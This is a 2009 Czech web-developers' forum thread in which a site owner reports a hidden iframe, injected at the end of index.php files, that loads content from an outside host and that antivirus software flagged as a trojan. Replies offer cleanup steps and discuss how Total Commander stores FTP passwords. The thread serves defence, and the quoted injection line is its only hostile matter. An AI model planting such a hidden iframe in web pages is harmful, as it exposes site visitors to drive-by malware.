Diskuse JPW: Napadení stránek trojským koněm

	Autor	Zpráva
	Etruska Profil	#1 · Zasláno: 11. 9. 2009, 12:40:48 Odpovědět Citovat Dobrý den, na klientových stránkách se z ničeho nic objevil tento nežádoucí kód: <iframe src="http://onniru.homelinux.org:8080/ts/in.cgi?open5" width=427 height=0 style="visibility: hidden"></iframe> , což klientův antivir označil jako trojského koně. Tento kód se objevil na konci souboru index.php a to jak v kořenovém adresáři webu, tak i ve stejnojmenném souboru redakčního systému. Stalo se to přesně v den kdy jsem nainstaloval editor tinymce, může to být tím? Napadá vás nějaká jiná možnost, kudy se mohl ten kód na stránky dostat? Děkuji za odpověď
	Joker Profil	#2 · Zasláno: 11. 9. 2009, 12:58:58 Odpovědět Citovat Máte na webu virus — co s tím?
	jardax Profil	#3 · Zasláno: 11. 9. 2009, 15:11:12 Odpovědět Citovat 1. Vymazat řádek ze souboru. 2. Přestat používat ftp klienta/TC a vymazat z nich hesla 3. Zmenit heslo na hostingu a pro ftp 4. Updatovat vsechny komponenty CMS (neni to Joomla?) 5. Nepouzivat komponenty CMS stahnute odkudkoliv:) napr. free verze placenych komponent z Rapidu :)
	Chamurappi Profil	#4 · Zasláno: 11. 9. 2009, 15:23:50 Odpovědět Citovat Reaguji na jardaxe: Špatné pořadí.
	Radek9 Profil	#5 · Zasláno: 11. 9. 2009, 15:28:47 Odpovědět Citovat jardax: „2. Přestat používat ftp klienta/TC a vymazat z nich hesla“ Nebo používat nejnovější TC, který šifruje hesla :) A nechápu proč přestat používat TC. Když neuložíš hesla, tak je jako každý jiný klient.
	Etruska Profil	#6 · Zasláno: 11. 9. 2009, 16:36:34 Odpovědět Citovat jardax Řádek už jsem vymazal, ale změnu hesla provedu raději až budu mít 100% jistotu, že můj počítač je čistý. Používám svůj redakční systém, jediná cizí komponenta je už zmiňovaný editor tinymce. Radek9 Zajímavé, to s tím šifrováním jsem nevěděl, hned si nový TC stáhnu.
	Hitman Profil	#7 · Zasláno: 11. 9. 2009, 19:38:57 Odpovědět Citovat Radek9 Šifrovali se i staré verze TC...jenže ta ochrana nebyla nikdy nic moc. Mám verzi starou asi 2 měsíce a můj program mi během 1 vteřiny dokáže rozšifrovat 5 hesel. Pokud je něco novějšího, tak nevím Raději bych doporučil neukládat hesla v Total Commanderu.
	Radek9 Profil	#8 · Zasláno: 11. 9. 2009, 19:59:42 Odpovědět Citovat Hitman: Je to něco novějšího... Teď vlastně přesnš nevím jestli je to šifra nebo hash, ale zatím to ještě nikdo nerozšifroval, takže to vidím na ten hash. Navíc je to chráněno pomocí master password, takže už se o hesla nebojím.
	nightfish Profil	#9 · Zasláno: 11. 9. 2009, 21:13:12 Odpovědět Citovat „Teď vlastně přesnš nevím jestli je to šifra nebo hash, ale zatím to ještě nikdo nerozšifroval, takže to vidím na ten hash. Navíc je to chráněno pomocí master password, takže už se o hesla nebojím.“ total commander verze 7.5 šifruje pomocí AES256, je to tedy šifra a ne hash (protože taky ty hesla potřebuje dešifrovat, aby se mohl připojit...) takže pokud použijete TC 7.5 a zvolíte si netriviální master heslo, tak se nemusíte bát, že by vám nějaký pobuda z něj ukradl hesla k FTP (to že si je může odposlechnout po síti je už věc jiná...)
		Časová prodleva: 15 let

Vaše odpověď

Mohlo by se hodit